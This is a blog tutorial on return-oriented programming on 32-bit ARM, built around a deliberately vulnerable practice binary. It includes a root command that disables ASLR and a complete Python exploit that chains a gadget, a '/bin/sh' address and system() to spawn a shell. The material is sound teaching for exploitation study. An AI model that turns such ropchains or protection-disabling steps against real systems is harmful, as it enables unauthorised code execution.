source for my site, found at icyphox.sh

---
date: '2019-06-06'
subtitle: 'Making stack-based exploitation great again!'
template: text.html
title: 'Return Oriented Programming on ARM (32-bit)'
url: 'rop-on-arm'
---

Before we start *anything*, you're expected to know the basics of ARM
assembly to follow along. I highly recommend
[Azeria's](https://twitter.com/fox0x01) series on [ARM Assembly
Basics](https://azeria-labs.com/writing-arm-assembly-part-1/). Once
you're comfortable with it, proceed with the next bit---environment
setup.

Setup
-----

Since we're working with the ARM architecture, there are two ways to
go about this:

1.  Emulate---head over to
    [qemu.org/download](https://www.qemu.org/download/) and install
    QEMU. Then download and extract the ARMv6 Debian Stretch image
    from one of the links [here](https://blahcat.github.io/qemu/). The
    scripts found inside should be self-explanatory.
2.  Use actual ARM hardware, like an RPi.

For debugging and disassembling, we'll be using plain old `gdb`, but you
may use `radare2`, IDA or anything else, really, all of which can be
trivially installed.

And for the sake of simplicity, disable ASLR (this needs root):

``` {.shell}
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
```
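
If you want to double-check that the setting took effect, a small sketch like this reads the value back. The helper name `aslr_mode` and its `path` parameter are made up for illustration; the meaning of each value is taken from the kernel's sysctl documentation.

```python
from pathlib import Path

ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

# Meaning of each value of kernel.randomize_va_space.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and VDSO randomized",
    2: "same as 1, plus heap (brk) randomized",
}


def aslr_mode(path=ASLR_PATH):
    """Return (value, description) for the ASLR setting stored at path."""
    value = int(Path(path).read_text().strip())
    return value, ASLR_MODES.get(value, "unknown")


if __name__ == "__main__":
    # Only Linux exposes this file, so skip quietly elsewhere.
    if Path(ASLR_PATH).exists():
        value, description = aslr_mode()
        print(f"randomize_va_space = {value} ({description})")
```

For the rest of this post you want it to report `0`. The setting does not survive a reboot, so re-check it if your addresses suddenly stop matching.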

Finally, the binary we'll be using in this exercise is [Billy
Ellis'](https://twitter.com/bellis1000)
[roplevel2](/static/files/roplevel2.c).

Compile it:

``` {.sh}
$ gcc roplevel2.c -o rop2
```

With that out of the way, here's a quick rundown of what ROP actually
is.

A primer on ROP
---------------

ROP, or Return Oriented Programming, is a modern exploitation technique
that's used to bypass protections like the **NX bit** (no-execute bit)
and **code signing**. In essence, no code in the binary is actually
modified and the entire exploit is crafted out of pre-existing artifacts
within the binary, known as **gadgets**.

A gadget is essentially a small sequence of code (instructions), ending
with a `ret`, or a return instruction. In our case, since we're dealing
with ARM code, there is no `ret` instruction but rather a `pop {pc}` or
a `bx lr`. These gadgets are *chained* together by jumping (returning)
from one onto the other to form what's called a **ropchain**. At the
end of a ropchain, there's generally a call to `system()`, to achieve
code execution.

In practice, the process of executing a ropchain is something like this:

-   confirm the existence of a stack-based buffer overflow
-   identify the offset at which the instruction pointer gets
    overwritten
-   locate the addresses of the gadgets you wish to use
-   craft your input keeping in mind the stack's layout, and chain the
    addresses of your gadgets

[LiveOverflow](https://twitter.com/LiveOverflow) has a [beautiful
video](https://www.youtube.com/watch?v=zaQVNM3or7k&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN&index=46&t=0s)
where he explains ROP using "weird machines". Check it out, it might be
just what you needed for that "aha!" moment :)

Still don't get it? Don't fret, we'll look at *actual* exploit code in a
bit and hopefully that should put things into perspective.

Exploring our binary
--------------------

Start by running it, and entering any arbitrary string. On entering a
fairly large string, say, "A" × 20, we see a segmentation fault occur.

![string and segfault](/static/img/string_segfault.png)

Now, open it up in `gdb` and look at the functions inside it.

![gdb functions](/static/img/gdb_functions.png)

There are three functions that are of importance here: `main`, `winner`
and `gadget`. Disassembling the `main` function:

![gdb main disassembly](/static/img/gdb_main_disas.png)

We see a buffer of 16 bytes being created (`sub sp, sp, #16`), and some
calls to `puts()`/`printf()` and `scanf()`. Looks like `winner` and
`gadget` are never actually called.

Disassembling the `gadget` function:

![gdb gadget disassembly](/static/img/gdb_gadget_disas.png)

This is fairly simple: the stack frame is set up by `push`ing
`{r11}`, which is also the frame pointer (`fp`). What's interesting is
the `pop {r0, pc}` instruction in the middle. This is a **gadget**.

We can use this to control what goes into `r0` and `pc`. Unlike in
32-bit x86, where arguments to functions are passed on the stack, in ARM
the registers `r0` to `r3` hold the first four arguments. So this gadget
effectively allows us to pass an argument to a function in `r0`, and
then jump to that function by placing its address in `pc`. Neat.
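
To make that concrete, here is a toy model of what `pop {r0, pc}` does to the registers and the stack. It's only a sketch: the `pop_r0_pc` helper, the register dictionary and both address constants are made up for illustration and have nothing to do with the real binary.

```python
def pop_r0_pc(regs, stack):
    """Model `pop {r0, pc}` on a stack held as a list of 32-bit words.

    ARM loads the lowest-numbered register from the lowest address, so
    r0 takes the word sp points at and pc takes the one right after it.
    """
    regs["r0"] = stack.pop(0)
    regs["pc"] = stack.pop(0)
    regs["sp"] += 8  # two 4-byte words were consumed
    return regs


# Hypothetical values, chosen only so they are easy to spot.
ARG_ADDR = 0xAAAA0000   # would point at the argument
FUNC_ADDR = 0xBBBB0000  # would be the function to "return" into

regs = {"r0": 0, "pc": 0, "sp": 0x1000}
stack = [ARG_ADDR, FUNC_ADDR]  # index 0 is the word sp points at

pop_r0_pc(regs, stack)
print({name: hex(value) for name, value in regs.items()})
```

Whoever controls those two stack words controls both the first argument and the next function to run, and that is all the exploit later on relies on.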

Moving on to the disassembly of the `winner` function:

![gdb winner disassembly](/static/img/gdb_disas_winner.png)

Here, we see calls to `puts()`, `system()` and finally, `exit()`. So
our end goal here is to, quite obviously, execute code via the
`system()` function.

Now that we have an overview of what's in the binary, let's formulate a
method of exploitation by messing around with inputs.

Messing around with inputs :\^)
-------------------------------

Back to `gdb`, hit `r` to run and pass in a patterned input, like in the
screenshot.

![gdb info reg post segfault](/static/img/gdb_info_reg_segfault.png)

We hit a segfault because of invalid memory at address `0x46464646`.
Notice the `pc` has been overwritten with our input. So we smashed the
stack alright, but more importantly, `0x46` is the letter 'F', so it's
the `FFFF` part of our pattern that lands in `pc`.
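
Working out the offset by eye is fine for a pattern this short, but it can also be scripted. The sketch below assumes the input was `AAAABBBBCCCC...` with one letter per 4-byte word (the exact pattern from the screenshot isn't reproduced here), and the helper names `make_pattern` and `offset_of` are my own.

```python
import string
import struct


def make_pattern(groups):
    """Build AAAABBBBCCCC...: one uppercase letter per 4-byte word."""
    letters = string.ascii_uppercase[:groups]
    return "".join(letter * 4 for letter in letters).encode()


def offset_of(pc_value, pattern):
    """Return the byte offset of the word that ended up in pc, or -1."""
    return pattern.find(struct.pack("<I", pc_value))


pattern = make_pattern(8)
offset = offset_of(0x46464646, pattern)  # the pc value from the crash

print(pattern.decode())
print("pc is overwritten after", offset, "bytes of padding")
```

The result is 20, which lines up with the 16-byte buffer plus one more 4-byte word. That extra word is presumably the saved `r11`, assuming `main` opens with `push {r11, lr}`.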

Since we know the offset at which the `pc` gets overwritten, we can now
control program execution flow. Let's try jumping to the `winner`
function.

Disassemble `winner` again using `disas winner` and note down the
address of the second instruction---`add r11, sp, #4`. We'll use
Python to print our input string, replacing `FFFF` with that address.
Note the endianness.

``` {.shell}
$ python -c 'print("AAAABBBBCCCCDDDDEEEE\x28\x05\x01\x00")' | ./rop2
```

![jump to winner](/static/img/python_winner_jump.png)
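
If the byte order in that command looks backwards, this short sketch shows where it comes from. The address is the one used in the command above; the constant name is just a label I picked.

```python
import struct

WINNER_SECOND_INSN = 0x00010528  # address used in the command above

little = struct.pack("<I", WINNER_SECOND_INSN)  # least significant byte first
big = struct.pack(">I", WINNER_SECOND_INSN)     # most significant byte first

print("little-endian:", little.hex())
print("big-endian:   ", big.hex())

# Unpacking with the same format gets the original value back.
assert struct.unpack("<I", little)[0] == WINNER_SECOND_INSN
```

The little-endian form is the one that matches `\x28\x05\x01\x00`, which is why the address appears reversed in the payload.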

The reason we don't jump to the first instruction is because we want to
control the stack ourselves. If we allow `push {r11, lr}` (first
instruction) to occur, the program will `pop` those out after `winner`
is done executing and we will no longer control where it jumps to.

So that didn't do much; it just prints out the string "Nothing much
here...". But it *does*, however, contain a call to `system()`, which
somehow needs to be given an argument to do what we want (run a
command, execute a shell, etc.).

To do that, we'll follow a multi-step process:

1.  Jump to the address of `gadget`, again the 2nd instruction. This
    will `pop` `r0` and `pc`.
2.  Place the address of our command to be executed, say "`/bin/sh`",
    next on the stack. This will go into `r0`.
3.  Then, place the address of `system()`. This will go into `pc`.

The pseudo-code is something like this:

    string = AAAABBBBCCCCDDDDEEEE
    gadget = # addr of gadget
    binsh  = # addr of /bin/sh
    system = # addr of system()

    print(string + gadget + binsh + system)

Clean and mean.

The exploit
-----------

To write the exploit, we'll use Python and the absolute godsend of a
module---`struct`. It allows us to pack the bytes of addresses to the
endianness of our choice. It probably does a lot more, but who cares.

Let's start by fetching the address of `/bin/sh`. In `gdb`, set a
breakpoint at `main`, hit `r` to run, and search memory starting at
`system` for the string "`/bin/sh`":

    (gdb) find &system, +9999999, "/bin/sh"

![gdb finding /bin/sh](/static/img/gdb_find_binsh.png)

One hit at `0xb6f85588`. The addresses of `gadget` and `system()` can be
found from the disassemblies from earlier. Here's the final exploit code:
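
``` {.python}
import struct
import sys

# Addresses come from the gdb session above and are specific to this
# build. "<I" packs a 32-bit unsigned integer in little-endian order.
string = b"AAAABBBBCCCCDDDDEEEE"         # 20 bytes of padding up to pc
gadget = struct.pack("<I", 0x00010550)   # lands on pop {r0, pc}
binsh = struct.pack("<I", 0xb6f85588)    # address of "/bin/sh" -> r0
system = struct.pack("<I", 0x00010538)   # system() -> pc

# Write raw bytes (Python 3); print() would re-encode bytes above 0x7f.
sys.stdout.buffer.write(string + gadget + binsh + system + b"\n")
```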

Honestly, not too far off from our pseudo-code :)

Let's see it in action:

![the shell!](/static/img/the_shell.png)

Notice that it doesn't work the first time, and this is because
`/bin/sh` terminates when the pipe closes, since there's no input coming
in from STDIN. To get around this, we use `cat(1)` which allows us to
relay input through it to the shell. Nifty trick.
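
The same idea can be sketched in Python if you'd rather drive the target from a script: send the payload, then keep the pipe open and forward whatever arrives on your own stdin. The function name `run_with_open_stdin` and its parameters are hypothetical, and this is a rough stand-in for `cat`, not a full interactive terminal.

```python
import subprocess
import sys


def run_with_open_stdin(argv, payload, source=None):
    """Send payload to the target, then relay lines from source to it.

    source defaults to this script's own stdin, so whatever you type is
    forwarded to the target, much like `cat` does in a shell pipeline.
    Returns the target's exit status.
    """
    if source is None:
        source = sys.stdin.buffer
    proc = subprocess.Popen(argv, stdin=subprocess.PIPE)
    try:
        # The newline ends the word that scanf() is waiting for.
        proc.stdin.write(payload + b"\n")
        proc.stdin.flush()
        for line in source:
            proc.stdin.write(line)
            proc.stdin.flush()
        proc.stdin.close()  # source hit EOF, so let the target see EOF too
    except BrokenPipeError:
        pass  # the target exited and closed its end of the pipe
    return proc.wait()
```

With the payload bytes from the exploit script in a variable (minus the trailing newline), the call would look something like `run_with_open_stdin(["./rop2"], payload)`.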

Conclusion
----------

This was a fairly basic challenge, with everything laid out
conveniently. Actual ropchaining is a little more involved, with a lot
more gadgets to be chained to achieve code execution.

Hopefully, I'll get around to writing about heap exploitation on ARM
too. That's all for now.